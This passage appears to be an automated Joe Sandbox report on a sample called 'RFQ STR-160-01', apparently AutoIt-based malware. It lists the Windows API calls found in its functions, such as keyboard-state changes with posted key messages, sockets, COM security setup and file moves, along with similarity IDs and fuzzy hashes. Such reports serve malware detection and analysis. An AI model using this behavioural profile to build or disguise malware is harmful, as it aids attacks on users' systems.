              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Variant$ClearInit
              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
              • API String ID: 2610073882-625585964
              • Opcode ID: e574e8e1de68fb06bfa7b1953e2f9bb101f44bed22281f8db05278fdda0451d0
              • Instruction ID: 03e5b693d4a463aee7f949b04023e46f0e928c480fa52b36ec49b54a35979a8d
              • Opcode Fuzzy Hash: e574e8e1de68fb06bfa7b1953e2f9bb101f44bed22281f8db05278fdda0451d0
              • Instruction Fuzzy Hash: 83918171A00215ABDF20CFA4D844FEEBBBAEF46715F148559F505AB280DB709985CFA0
              APIs
              • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0060125C
              • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00601284
              • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 006012A8
              • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 006012D8
              • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0060135F
              • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 006013C4
              • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00601430
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ArraySafe$Data$Access$UnaccessVartype
              • String ID:
              • API String ID: 2550207440-0
              • Opcode ID: 1d24608326a720448a05675533a53e0ee95ec5dfe220b6e1caa4de6c8bc73101
              • Instruction ID: 13c33f91b88ed509761d0cb4db251a1f25df4332e4bab9436c2205f84cf4890a
              • Opcode Fuzzy Hash: 1d24608326a720448a05675533a53e0ee95ec5dfe220b6e1caa4de6c8bc73101
              • Instruction Fuzzy Hash: 6891B071A402199FEB18DF94C885BBFB7B6FF46325F144029E501EB2E1D774A942CB90
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ObjectSelect$BeginCreatePath
              • String ID:
              • API String ID: 3225163088-0
              • Opcode ID: 0c86b328571628898fb28ea2069f988bfe4d978d7e46bdfba4b59d8473e27e39
              • Instruction ID: 4cfc080b1d906ff8a5654bd8a7c121bc88671104e5ce5ae88e74014925c7bef2
              • Opcode Fuzzy Hash: 0c86b328571628898fb28ea2069f988bfe4d978d7e46bdfba4b59d8473e27e39
              • Instruction Fuzzy Hash: 62912671D0021AEFCB14CFA9C889AEEBFB9FF89320F148455E515B7251D375A942CBA0
              APIs
              • VariantInit.OLEAUT32(?), ref: 0061396B
              • CharUpperBuffW.USER32(?,?), ref: 00613A7A
              • _wcslen.LIBCMT ref: 00613A8A
              • VariantClear.OLEAUT32(?), ref: 00613C1F
                • Part of subcall function 00600CDF: VariantInit.OLEAUT32(00000000), ref: 00600D1F
                • Part of subcall function 00600CDF: VariantCopy.OLEAUT32(?,?), ref: 00600D28
                • Part of subcall function 00600CDF: VariantClear.OLEAUT32(?), ref: 00600D34
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
              • String ID: AUTOIT.ERROR$Incorrect Parameter format
              • API String ID: 4137639002-1221869570
              • Opcode ID: 7492788754723882b773aa9762a2b4da092ab47f7352164460315aa1446b82d3
              • Instruction ID: df5782dbbac66e10f86b395803c266347b9af10d2ab661f9f497112bdc79c10d
              • Opcode Fuzzy Hash: 7492788754723882b773aa9762a2b4da092ab47f7352164460315aa1446b82d3
              • Instruction Fuzzy Hash: 58916D746083059FCB04DF24C4849AABBE5FF89314F18896DF88A9B351DB30EE45CB92
              APIs
                • Part of subcall function 005F000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,005EFF41,80070057,?,?,?,005F035E), ref: 005F002B
                • Part of subcall function 005F000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,005EFF41,80070057,?,?), ref: 005F0046
                • Part of subcall function 005F000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,005EFF41,80070057,?,?), ref: 005F0054
                • Part of subcall function 005F000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,005EFF41,80070057,?), ref: 005F0064
              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00614C51
              • _wcslen.LIBCMT ref: 00614D59
              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00614DCF
              • CoTaskMemFree.OLE32(?), ref: 00614DDA
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
              • String ID: NULL Pointer assignment
              • API String ID: 614568839-2785691316
              • Opcode ID: e3eee52abd4dc9c05fef77f0332f00601674eecd0d3b3a028b55274d51e5024a
              • Instruction ID: 0fbcdeb6767481fea74d77d926beb155bf0198bacb58f3d1ab65731f20b878eb
              • Opcode Fuzzy Hash: e3eee52abd4dc9c05fef77f0332f00601674eecd0d3b3a028b55274d51e5024a
              • Instruction Fuzzy Hash: DA914971D0021EAFDF10DFA4D894EEEBBB9BF48310F148169E915A7241EB349A45CFA0
              APIs
              • GetMenu.USER32(?), ref: 00622183
              • GetMenuItemCount.USER32(00000000), ref: 006221B5
              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 006221DD
              • _wcslen.LIBCMT ref: 00622213
              • GetMenuItemID.USER32(?,?), ref: 0062224D
              • GetSubMenu.USER32(?,?), ref: 0062225B
                • Part of subcall function 005F3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 005F3A57
                • Part of subcall function 005F3A3D: GetCurrentThreadId.KERNEL32 ref: 005F3A5E
                • Part of subcall function 005F3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,005F25B3), ref: 005F3A65
              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 006222E3
                • Part of subcall function 005FE97B: Sleep.KERNEL32 ref: 005FE9F3
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
              • String ID:
              • API String ID: 4196846111-0
              • Opcode ID: 09baca5fe7c36ffec6939cfb70fa6fc11418bf63b9b736c292d832870e4b435e
              • Instruction ID: 04ef5dbdc4092798783da52d09f90819fa6a0887b4b9faafcb2c7233c7c05c4a
              • Opcode Fuzzy Hash: 09baca5fe7c36ffec6939cfb70fa6fc11418bf63b9b736c292d832870e4b435e
              • Instruction Fuzzy Hash: B8718F35A00616EFCB10DFA4D855AAEBBF6FF88310F108459E916AB351D735EE428F90
              APIs
              • GetParent.USER32(?), ref: 005FAEF9
              • GetKeyboardState.USER32(?), ref: 005FAF0E
              • SetKeyboardState.USER32(?), ref: 005FAF6F
              • PostMessageW.USER32(?,00000101,00000010,?), ref: 005FAF9D
              • PostMessageW.USER32(?,00000101,00000011,?), ref: 005FAFBC
              • PostMessageW.USER32(?,00000101,00000012,?), ref: 005FAFFD
              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 005FB020
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: MessagePost$KeyboardState$Parent
              • String ID:
              • API String ID: 87235514-0
              • Opcode ID: 4fba668e2b94e9c22a74682e9500285fc808d4ae4b4bf33d08b1993006cd8959
              • Instruction ID: 82979c305cb676808aa7380a2d17199d984567f9d836d09b04d05e20bc823b81
              • Opcode Fuzzy Hash: 4fba668e2b94e9c22a74682e9500285fc808d4ae4b4bf33d08b1993006cd8959
              • Instruction Fuzzy Hash: E35191E06047D97DFB364234CC49BBA7EA97B06304F088589E2D9598C3D79DA8C4D752
              APIs
              • GetParent.USER32(00000000), ref: 005FAD19
              • GetKeyboardState.USER32(?), ref: 005FAD2E
              • SetKeyboardState.USER32(?), ref: 005FAD8F
              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 005FADBB
              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 005FADD8
              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 005FAE17
              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 005FAE38
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: MessagePost$KeyboardState$Parent
              • String ID:
              • API String ID: 87235514-0
              • Opcode ID: 59885ad6cb8c219ffd16512a0582419b45835211e6a02ca29f9d26387195ec43
              • Instruction ID: 74e9809756019a84a420ff50e995e508a50328eb13a3b5ce38d7e4afd16c6702
              • Opcode Fuzzy Hash: 59885ad6cb8c219ffd16512a0582419b45835211e6a02ca29f9d26387195ec43
              • Instruction Fuzzy Hash: E051B1E15447D93DFB368324CC55B7ABEA97B46300F088589E3D9868C2D298EC88D763
              APIs
              • GetConsoleCP.KERNEL32(005D3CD6,?,?,?,?,?,?,?,?,005C5BA3,?,?,005D3CD6,?,?), ref: 005C5470
              • __fassign.LIBCMT ref: 005C54EB
              • __fassign.LIBCMT ref: 005C5506
              • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,005D3CD6,00000005,00000000,00000000), ref: 005C552C
              • WriteFile.KERNEL32(?,005D3CD6,00000000,005C5BA3,00000000,?,?,?,?,?,?,?,?,?,005C5BA3,?), ref: 005C554B
              • WriteFile.KERNEL32(?,?,00000001,005C5BA3,00000000,?,?,?,?,?,?,?,?,?,005C5BA3,?), ref: 005C5584
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
              • String ID:
              • API String ID: 1324828854-0
              • Opcode ID: 5aa7097cd44f19a4a86a9c8c729202ccca0619a13ade4e35995589ebdd2272ce
              • Instruction ID: cdb58cecef225c2c75c977c50c52affaa9dfdec230b6a12df419d3b3b3312cb6
              • Opcode Fuzzy Hash: 5aa7097cd44f19a4a86a9c8c729202ccca0619a13ade4e35995589ebdd2272ce
              • Instruction Fuzzy Hash: 2A518171A00649AFDB10CFE8D845FEEBBF9FB09310F14451EE955E7291E670AA81CB60
              APIs
                • Part of subcall function 0061304E: inet_addr.WSOCK32(?), ref: 0061307A
                • Part of subcall function 0061304E: _wcslen.LIBCMT ref: 0061309B
              • socket.WSOCK32(00000002,00000001,00000006), ref: 00611112
              • WSAGetLastError.WSOCK32 ref: 00611121
              • WSAGetLastError.WSOCK32 ref: 006111C9
              • closesocket.WSOCK32(00000000), ref: 006111F9
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
              • String ID:
              • API String ID: 2675159561-0
              • Opcode ID: 40ceadee83ae6e484894447ef2b261477f33bc6b9caaa84da24d3650696e2b86
              • Instruction ID: 27060d18d3baa446c132a627b987138fe24ddd2bf7b39c528f4da9d4867b1ef0
              • Opcode Fuzzy Hash: 40ceadee83ae6e484894447ef2b261477f33bc6b9caaa84da24d3650696e2b86
              • Instruction Fuzzy Hash: FC41C431600614AFDB109F14C845BE9BBEBFF46324F188059FA159F391D774AD82CBA1
              APIs
                • Part of subcall function 005FDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,005FCF22,?), ref: 005FDDFD
                • Part of subcall function 005FDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,005FCF22,?), ref: 005FDE16
              • lstrcmpiW.KERNEL32(?,?), ref: 005FCF45
              • MoveFileW.KERNEL32(?,?), ref: 005FCF7F
              • _wcslen.LIBCMT ref: 005FD005
              • _wcslen.LIBCMT ref: 005FD01B
              • SHFileOperationW.SHELL32(?), ref: 005FD061
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
              • String ID: \*.*
              • API String ID: 3164238972-1173974218
              • Opcode ID: 8c18a969e465e3daaaf3d728698fa66de2c45f3e84063c22e6798d6e1310b28f
              • Instruction ID: 721b9bf96aa80ad3e2004534d19dfe21db0ad3dad4d4911dca775c66504efdc8
              • Opcode Fuzzy Hash: 8c18a969e465e3daaaf3d728698fa66de2c45f3e84063c22e6798d6e1310b28f
              • Instruction Fuzzy Hash: 2D41467194521D5FDF12EBA4CA85EEEBFB9BF48340F1000E6E605EB151EA38A749CB50
              APIs
              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00622E1C
              • GetWindowLongW.USER32(00000000,000000F0), ref: 00622E4F
              • GetWindowLongW.USER32(00000000,000000F0), ref: 00622E84
              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00622EB6
              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00622EE0
              • GetWindowLongW.USER32(00000000,000000F0), ref: 00622EF1
              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00622F0B
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: LongWindow$MessageSend
              • String ID:
              • API String ID: 2178440468-0
              • Opcode ID: e8373657cf3c107ce3e2913424263b64902c2e9e5747e232cf348a1bbd7294e5
              • Instruction ID: 0e52510768787a27d6b186d80820827371f164e6e6241ebe17d5eb311a099aa8
              • Opcode Fuzzy Hash: e8373657cf3c107ce3e2913424263b64902c2e9e5747e232cf348a1bbd7294e5
              • Instruction Fuzzy Hash: C5311930644562AFDB20CF18EC94FA537E2FB5A720F1A5164F5408F2B1CBB1A841EF01
              APIs
              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005F7769
              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005F778F
              • SysAllocString.OLEAUT32(00000000), ref: 005F7792
              • SysAllocString.OLEAUT32(?), ref: 005F77B0
              • SysFreeString.OLEAUT32(?), ref: 005F77B9
              • StringFromGUID2.OLE32(?,?,00000028), ref: 005F77DE
              • SysAllocString.OLEAUT32(?), ref: 005F77EC
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
              • String ID:
              • API String ID: 3761583154-0
              • Opcode ID: a153d1fd37d6c355b974ba6d7d4213f5e4f0b7baa96985656d5e3c3d7b7e0960
              • Instruction ID: 46be998e37008ce2a3cac03b7f9e61c8b6fa99a895b51a968ba310e355d996ef
              • Opcode Fuzzy Hash: a153d1fd37d6c355b974ba6d7d4213f5e4f0b7baa96985656d5e3c3d7b7e0960
              • Instruction Fuzzy Hash: E8219F7661561DAFDB10AFA8CC88CBF7BEDFB093647108425FA14DB150D6749C428BA0
              APIs
              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005F7842
              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 005F7868
              • SysAllocString.OLEAUT32(00000000), ref: 005F786B
              • SysAllocString.OLEAUT32 ref: 005F788C
              • SysFreeString.OLEAUT32 ref: 005F7895
              • StringFromGUID2.OLE32(?,?,00000028), ref: 005F78AF
              • SysAllocString.OLEAUT32(?), ref: 005F78BD
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
              • String ID:
              • API String ID: 3761583154-0
              • Opcode ID: 21c43a54262aa4f9d100a3edfece81e3eba843fd9d9b2f06e02f07e4697605a7
              • Instruction ID: 4c53502cee08008c50f245921898602666e99e6f76ba93f11580eefabb6d7c2d
              • Opcode Fuzzy Hash: 21c43a54262aa4f9d100a3edfece81e3eba843fd9d9b2f06e02f07e4697605a7
              • Instruction Fuzzy Hash: 6A214F31604509AFDB20ABA8DC89DBA7BEDFB097A07108525BA15CB2A1D664DC41CB64
              APIs
              • GetStdHandle.KERNEL32(0000000C), ref: 006004F2
              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0060052E
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: CreateHandlePipe
              • String ID: nul
              • API String ID: 1424370930-2873401336
              • Opcode ID: 13ec54d6545b3bd062c66e38eb38474f8282ffb3f9cdaa8706ec1d93aee2c5b4
              • Instruction ID: a8114c37e08009d69f1d8e4f88a2cae97068065a2f96067d3d1cc9e18608990d
              • Opcode Fuzzy Hash: 13ec54d6545b3bd062c66e38eb38474f8282ffb3f9cdaa8706ec1d93aee2c5b4
              • Instruction Fuzzy Hash: 18218BB5540706EBEB258F29DD04B9B7BB6EF44724F204A29F8A1D72E0D7709941CF20
              APIs
              • GetStdHandle.KERNEL32(000000F6), ref: 006005C6
              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00600601
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: CreateHandlePipe
              • String ID: nul
              • API String ID: 1424370930-2873401336
              • Opcode ID: 57185594218a62b70e93e9590f5d8d4be2602b7a182288b76d0eda4693eeb99e
              • Instruction ID: 53b0fd826b3165195b65efbb02c7ea3fd85459bf4d858c96d875e862aab3a1f9
              • Opcode Fuzzy Hash: 57185594218a62b70e93e9590f5d8d4be2602b7a182288b76d0eda4693eeb99e
              • Instruction Fuzzy Hash: 29219F355407069BEB288F68DC04B9B77A6AF85730F200A19F8A1E33E0DB719961CB10
              APIs
                • Part of subcall function 0059600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0059604C
                • Part of subcall function 0059600E: GetStockObject.GDI32(00000011), ref: 00596060
                • Part of subcall function 0059600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0059606A
              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00624112
              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0062411F
              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0062412A
              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00624139
              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00624145
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
